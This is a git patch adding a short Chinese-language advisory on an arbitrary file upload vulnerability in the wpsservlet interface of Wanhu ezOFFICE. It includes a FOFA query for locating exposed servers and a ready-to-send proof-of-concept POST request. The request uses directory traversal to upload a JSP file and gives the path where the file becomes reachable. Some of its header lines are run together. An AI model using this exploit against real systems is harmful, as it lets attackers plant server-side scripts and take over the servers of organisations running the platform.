From 54a020fdb9ce96767c7f841e8ee4d3c410fc6d2e Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Fri, 15 Dec 2023 12:38:17 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E4=B8=87=E6=88=B7ezoffice=20wpsservle?= =?UTF-8?q?t=E4=BB=BB=E6=84=8F=E6=96=87=E4=BB=B6=E4=B8=8A=E4=BC=A0?= =?UTF-8?q?=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 万户ezoffice wpsservlet任意文件上传漏洞.md | 28 ++++++++++++++++++++++
 1 file changed, 28 insertions(+)
 create mode 100644 万户ezoffice wpsservlet任意文件上传漏洞.md
diff --git a/万户ezoffice wpsservlet任意文件上传漏洞.md b/万户ezoffice wpsservlet任意文件上传漏洞.md
new file mode 100644
index 0000000..c18efa4
--- /dev/null
+++ b/万户ezoffice wpsservlet任意文件上传漏洞.md
@@ -0,0 +1,28 @@
+## 万户ezoffice wpsservlet任意文件上传漏洞
+万户ezOFFICE协同管理平台是一个综合信息基础应用平台分为企业版和政务版。解决方案由五大应用、两个支撑平台组成,分别为知识管理、工作流程、沟通交流、辅助办公、集成解决方案及应用支撑平台、基础支撑平台。万户ezOFFICE协同管理平台wpsservlet接口存在任意文件上传。攻击者可上传恶意脚本文件获取服务器权限。
+
+
+## fofa
+```
+app="万户网络-ezOFFICE"
+```
+
+## poc
+```
+POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
+Host: x.x.x.x
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
+Content-Length: 173Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Connection: close
+Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerpDNT: 1
+Upgrade-Insecure-Requests: 1
+
+--ufuadpxathqvxfqnuyuqaozvseiueerp
+Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
+
+<% out.print("sasdfghjkj");%>
+--ufuadpxathqvxfqnuyuqaozvseiueerp--
+```
+文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
+